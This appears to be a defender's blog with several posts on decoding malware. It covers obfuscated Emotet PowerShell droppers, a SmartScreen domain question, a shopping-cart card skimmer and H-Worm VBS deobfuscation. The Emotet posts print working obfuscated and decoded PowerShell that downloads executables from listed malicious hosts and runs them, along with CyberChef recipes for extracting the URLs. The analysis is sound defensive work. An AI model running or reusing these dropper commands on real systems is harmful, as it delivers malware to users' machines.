Tuesday, July 10, 2018

July Emotet Encoded Powershell Observed

I love taking the time to de-obfuscate newly observed scripts, and Emotet gives me plenty of opportunity to do this. As I posted last month, there are a number of ways to decode these, and I could just simply run these through a sandbox, but I like to really understand the obfuscation for my self.  Which is why I take the time to reverse it a little bit, and to share how I go about it.

I will say that since I started using Cyber Chef, it almost feels like cheating in a way. I had a python script that I kept updating to look for signs of known emotet encodings that I've observed and then decode them. I was up to version 8 of my script, I still write this stuff to keep in practice, but I find Cyber Chef to be a much faster method for "writing" a decoder of sorts.

So, the new variant I had observed looks like this:

powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( 'RVDbagIxEP2VfQhEsZv0oVAwLAi1F6QthUXE0pdJdupGs0nMjm5F/PeuUizM0zlzLjPMfj4XHrs86DUayt6RxAL1g7PoSbHXGRW8JopjKWOyDabowAcR0koutZz8UbDHHDwJExq5u6LNDizVYEV0UlddC/+CdQPNrrUGnFhH2YVUxYRtK7uYm+Cpz5aP5rYsrwIPq3CAxprN4ZJiwNS41S6spJ4uZm/zqeSijM7SgE/4UDHTzrMi4/d3XDGqtgVDvx8TNnHEv/joTI+4wB/k6jsk7N0G7MX6rJ/z0cMjpcOR9c8R09B5F6B6sg4vOzfZ2XCoSoJE+UcKpm9+wZTunTbqZIBMfTydfgE=' ), [IO.comprEsSION.CompREssIONmoDE]::dECoMprEsS ) | fOREACH-OBject{ nEW-obJeCt SySteM.io.StREamreAder($_, [SyStem.tEXt.EncodiNg]::ASCIi ) } | FOReaCH-ObjEcT{ $_.rEADToENd( ) }) |. ( $eNv:CoMspeC[4,24,25]-join'')

The first thing to notice is that there is simple base64 encoding going on here. However, decoding this as-is, looks like this (using base64 -d from command line):

��� �J.���Q�� <0 ne="" s.3="" trw=""> �<�5 �ޑ� ����I�� �&�c)c� ��u ͮ� �XGمTńm+�����ϖ���,� �p�ƚ���b�Ը�.���.fo��䢌�ҀO�P1�γ"��w\1��C� 6qĿ��L��� ��;$�� ��������#�Ñ�� ��y �z�/;7��p�J�D�G �o~����6�d�L}<�~

This isn't very helpful, however, when to look at the next clue,  you can see  that it is compressed and being decompressed.

This isn't new to me, I've observed other similar tactics being used with tools like powersploit, a quick python script I wrote a while back for aforementioned tactics actually works here. Forgive the long winded approach here, I never streamlined this:

echo "base64code" | base64 -d >> evilb64
python powershelldeflate2.py -i evilb64 $iZG=new-object Net.WebClient;$LJt='http://primerplano[.]org/Yb/@http://ave-ant[.]com/u/@http://muaithai[.]pl/bdwsab/@http://jmamusical[.]jp/wordpress/wp-content/Ec0SS/@http://nagoyamicky[.]com/cacheqblog/bDWJMUD/'.Split('@');$csU = '74';$tdq=$env:temp+'\'+$csU+'.exe';foreach($Hin in $LJt){try{$iZG.DownloadFile($Hin, $tdq);Start-Process $tdq;break;}catch{}}

My python script is largely based on information found here.  It attempts to use ZLIB and GZIP for decompressing the file.

Now, the other way I approached this "other than using write-host in powershell" is to use Cyber Chef to see if I could even write a recipe for this variant. Here is that recipe!

Regular_expression('User defined','\\(\\s\\\'[a-zA-Z0-9/+=]*\\\'',true,true,false,false,false,false,'List matches') Find_/_Replace({'option':'Regex','string':'[\\(\\\'\\)]'},'',true,false,true) From_Base64('A-Za-z0-9+/=',true) Raw_Inflate(0,0,'Adaptive',false,false) Split('@','\\n') Regular_expression('User defined','https?[:a-zA-Z0-9/.-]*',true,true,true,true,false,false,'List matches')


As you can see the Cyber Chef output is pretty clean, as always, if anyone has any better RegEx to use here, I always enjoy optimizing these things. I hope everyone finds this useful.

Friday, June 22, 2018

New Emotet encoding observed and decoded

Nothing earth shattering to report here, I just wanted to share the latest Emotet encoded powershell command and one simple way to decode it to extract the Stage 2 download links.

I know, a lot of these obfuscated powershells can be easily decoded by simply using the write-host command, however, I do like to try different ways to reverse the obfuscation, as I think it just makes for a good analyst exercise.

The powershell command is encoded as:

POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68>70J4!102!106O25I77t121O30>106O4J107V67J95O95-91!17I4>4t92t92-92J5!71-66>74H74-88!88>68I72x66I74I95H78t5x72I68t70!4I98-94!24V90I67H77!104H4>107H67x95I95>91!17I4I4I95H78>88!95>5!79O66O89O64!95x94I66H91x5t69-71>4-126O18V83O104I120x4H107J67J95V95V91V17!4>4!92I92I92>5J65I83V88V95>94-79t66I68V5x89>94J4t66I92J79V114>105>4>12!5!120H91H71t66I95J3O12H107t12x2t16-15I66H91J74J92O89I11t22O11>15I77t81V95I124>96J92>5!69V78t83H95J3!26!7t11V26>27H24I19V30V25-2V16-15x102V105>77t113-108!11>22t11!15I78t69-93I17H95!78O70H91I11I0t11J12I119x12>11-0I11H15t66I91!74H92>89J11J0V11>12O5!78J83-78t12!16I77t68-89-78x74V72t67-3J15x65V120H69x123I72t11J66!69x11V15-97O88t94I74J66J2x80H95t89H82J80J15>92!64O89!122x114!5I111x68t92V69-71I68!74O79-109I66I71!78V3O15x65J120t69>123!72t5x127O68H120t95J89!66>69H76V3I2x7t11!15t102J105H77O113H108!2-16I120I95I74-89x95>6>123!89H68-72I78t88t88t11H15V102J105V77>113H108-16I73t89I78J74O64x16J86I72H74!95J72V67J80t92!89I66V95I78!6I67I68O88-95-11H15-116>5H110V83I72-78>91O95>66>68I69-5J102H78t88J88!74!76x78-16J86>86' -SplIT '>' -spLiT'X' -SpLiT '!'-sPlIt 'V' -SplIt'o' -SPLiT'i'-sPliT 'H'-SpLIT'-'-sPlit't'-sPLIt'J' |forEaCh{ [CHaR] ( $_-bXOr'0x2b' ) })+" $(SEt 'OfS' ' ') " )

There are a couple quick things to note here which make reversing this pretty simple to understand. First, notice the -Split commands, these are setting delimiters, and then notice the -bXOr '0x2b' command, this tells us that the command is encoded with XOR key 0x2b.

 There are a lot of ways to handle this, such as using the Linux TR command and other commands to strip out the punctuation and alpha characters, convert the decimal values and then apply the XOR key. However, I think it's worth pointing out the CyberChef tool to do this instead.

Here is a custom recipe I used in CyberChef to decode this:


Find_/_Replace({'option':'Regex','string':'[^\\w\\s]|[a-zA-Z]'},' ',true,false,true) From_Decimal('Space') XOR({'option':'Hex','string':'2b'},'Standard',true) Regular_expression('User defined','(https?\\x3a\\x2f\\x2f[wW]*\\.?[a-zA-Z0-9]+\\x2d?[a-zA-Z0-9]*\\x2e[a-zA-Z]+\\x2e?\\w*\\x2e?\\w*\\x2e?\\x2f[a-zA-Z0-9]+\\x2f)',true,true,false,true,false,false,'Highlight matches')

When applied, I get my stage2 download links:




















If anyone has any improvements on the last bit of RegEx in the recipe let me know, it doesn't always catch all the links.

Wednesday, May 9, 2018

What is canonicalizer.ucsuri.tcs?

Recently I have observed a few hosts which were attempting to POST data to this domain, albeit, unsuccessfully as this is not a valid domain. Everything about the data in the PCAP suggests Microsoft SmartScreen, such as the user agent and even the decoded hex in the HTTP request header:

For example:

252F680074007400700073003a002f002f00700069006e0067002e002e0063006800650063006b0061007000700065007800650063002e006d006900630072006f0073006f00660074002e0063006f006d002f00770069006e0064006f00770073002f007300680065006c006c002f0061006300740069006f006e007300
Translates to https://ping..checkappexec.microsoft.com/windows/shell/actions

Upon further investigation, I found that several hosts were attempting to query and unsuccessfully resolve this domain.  So I did some digging and the results for this ranged wildly:

A Patent for reputation based software
patentimages.storage.googleapis.com/pdfs/US8695092.pdf

A suggestion that this is part of a Canon printer
https://translate.google.com/translate?hl=en&sl=de&u=https://www.windows-7-forum.net/threads/canonicalizer-ucsuri-tcs.44343/&prev=search

A couple Hybrid-analysis sandbox submissions for phishing pages where this domain was observed in DNS

And an AlienVault link which shows that this link didn't resolve even back a few years ago
https://otx.alienvault.com/indicator/hostname/canonicalizer.ucsuri.tcs?utm_medium=InProduct&utm_source=ThreatCrowd

Pivoting from the AlienVault link, I wen to the associated VirusTotal page:
https://www.virustotal.com/en/domain/canonicalizer.ucsuri.tcs/information/

The relevant information here is:
Latest files that are not detected by any antivirus solution and embed URL pattern strings with the domain provided.

Which links here:
https://www.virustotal.com/en/file/1437c574656520724e6ceafa00667d90b8abc78bd54d8962ece21a4203c7f726/analysis/

The piece that stands out here is the file name: ieapfltr.dll, which is part of SmartScreen.
So, I figured I would pull a few known clean hosts together, a Windows 7 and a couple Windows 10 hosts and sure enough they have this dll. In each case I ran the following:

strings -el ieapfltr.dll | grep "http"
or
strings -el ieapfltr.dll | grep "\.tcs"


strings -el ieapfltr.dll | grep "\.tcs"
Results: canonicalizer.ucsuri.tcs http://canonicalizer.ucsuri.tcs

My conclusion is that this is a part of SmartScreen, but why have only a couple hosts been observed with a POST to this domain? Why are so many hosts attempting to resolve this domain? What is the purpose of this non-valid TLD anyway? I'm left with a lot of questions, but do not believe at this time that there is anything malicious about this domain. I'm hoping someone has some more information about this, if you do, please contact me.

Saturday, September 9, 2017

Capture The Flag September 2017

I'm thinking that every once in a while I'll post a CTF challenge for fun. Any CTF files will be password protected with the password of "infected". While none of the file will be malicious, I still encourage use of an isolated system.

Get the file here.


Friday, September 1, 2017

Decoding the latest Emotet Powershell

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before, an emial phish with a link, the link downloads a malicious document. The document, usually a malicious word document, uses VBA to build and execute a powershell command which then will download the next stage of infection.

This used to be very simple to see, for example, older observed variants produced the following powershell:

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}} 
 
However, a newer variant now encodes the powershell with Base64, then uses some simple obfuscation techniques to make identification of the stage 2 links more difficult for an analyst.

For example:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAB7A......................B9AH0ADQAKAA=="

decodes

echo "JAB7A......................B9AH0ADQAKAA==" | base64 -d ${wscr`I`pT} = .("{1}{0}{2}"-f 'w-','ne','object') -ComObject ("{2}{1}{0}{3}" -f 'he','ript.S','WSc','ll');${W`eb`ClIEnT} = &("{2}{1}{0}" -f 'bject','-o','new') ("{4}{0}{1}{3}{2}" -f 'W','ebCl','t','ien','System.Net.');${Ra`NDOm} = .("{1}{2}{0}" -f'w-object','n','e') ("{0}{1}" -f'r','andom');${U`RlS} = ("{4}{21}{8}{22}{14}{20}{17}{1}{5}{6}{9}{7}{15}{11}{13}{19}{10}{16}{18}{12}{3}{0}{23}{2}{24}" -f'subs','p:/','ibe/N','m/','http://bellittise','/dbflett.com/Yq','sSad/,http','//arma','rature.it/in',':','/stor','cl/R','co','fWMwd/,http:','de','dores.','e503','C/,http://bringit.pt/Hv/,htt','.','/','/','r','clu','cr','qWPC/').("{1}{0}" -f'plit','S').Invoke(',');${na`me} = ${R`AN`DOM}.("{1}{0}" -f 't','nex').Invoke(1, 65536);${Pa`Th} = ${eNV`:`Temp} + '\' + ${n`AMe} + ("{0}{1}"-f'.e','xe');foreach(${U`Rl} in ${u`Rls}){try{${We`B`CLiE`NT}.("{3}{0}{1}{2}" -f'wnlo','adF','ile','Do').Invoke(${U`Rl}.("{1}{0}{2}" -f 'in','ToStr','g').Invoke(), ${pa`Th});.("{0}{3}{4}{2}{1}" -f'Sta','ess','oc','r','t-Pr') ${P`Ath};break;}catch{&("{2}{0}{1}"-f 'ite-h','ost','wr') ${_}."e`x`cEPt`ioN"."meS`sA`gE";}} 
 
So, you could manually work through the transpositions here, however a nice technique was shown at Myonlinesecurity
If you don't have immediate access to powershell, you could also manually copy the same relevant pieces into a quick python script.
Here is an example:



The output:

Friday, June 23, 2017

Beware Compromised Shopping Carts

I think many people have stumbled upon "less than secure" sites which claim to have a secure checkout. I can't even count how many times I've looked for some obscure items on the web and have come across a website which just seems a bit off.

Yesterday I received a Snort alert which I often see on a compromised host: ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad

What I instantly noticed in the transcript is that this isn't the normal POST that I see from Zeus. What I had seen was a GET request with users Credit Card and Billing information in the Request Header. See Screenshot:


I've excluded the rest of the transcript, so as not to mention the site which is actually compromised at this time. However, I will say that it is very clear when looking at surrounding PCAPs from the source IP that the user was shopping for Building supplies. When looking at the websites Checkout page, I stumbled upon the following code:

Click to Enlarge

It would appear that the site has been compromised with injected code which scrapes the billing information that users enter into the checkout page.

Just as a side note the Direct IP address being utilized in this compromise has been associated with Fraudulent CC charges in the past, see abuseipdb.com 

If anyone has anymore information in this malicious code, please let me know. It seems to have some similar characteristics to evil-eval-magento.js which is also described Here.


Friday, August 19, 2016

Decoding H-Worm

H-Worm or Houdini Worm is a VB Script which uses obfuscation techniques in an attempt to hide  code. I'm not here to reinvent the wheel, there's already good articles on H-Worm, including This Fireeye article.

I will however point out that with the right indicators in Snort, network traffic can be used to pin down a host which may be beaconing to a known URI structure for H-Worm, including the POST is-ready indicator.

I had observed one host which had a VBS file in startup named adobe_flash_player.vbs. Since this host had tripped my snort signature, I decided to look at this as a file of interest. This particular file had a couple layers of obfuscation.

In this screen capture we see the file appears to be a JPG file (although, it doesn't actually display, it really appears to be garbage)







This is an attempt to have an analyst potentially brush it off as a malformed JPG. However, if we scroll down to the end of the file we see something interesting.










When I delete all the garbage above this I end up with the following VBS.









For the purpose of saving space here, I only included a screen capture. To understand the magnanimity of of the aawaawaaaawaawswaaaaa string, if taking away wordwarpping it is 62 pages of text.

To deobfuscate this I took note of the Execute (awasw(aawaawaaaawaawswaaaaa) command and replaced it with some very common simple code.

Set objFSO=CreateObject("Scripting.FileSystemObject")
outFile="c:\users\USER\desktop\decoded.txt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write (awasw(aawaawaaawaawswaaaaa)) & vbCrLf
objFile.Close

The result of this is.....
































Hopefully this simple method for deobfuscating is found to be useful to others. Happy hunting!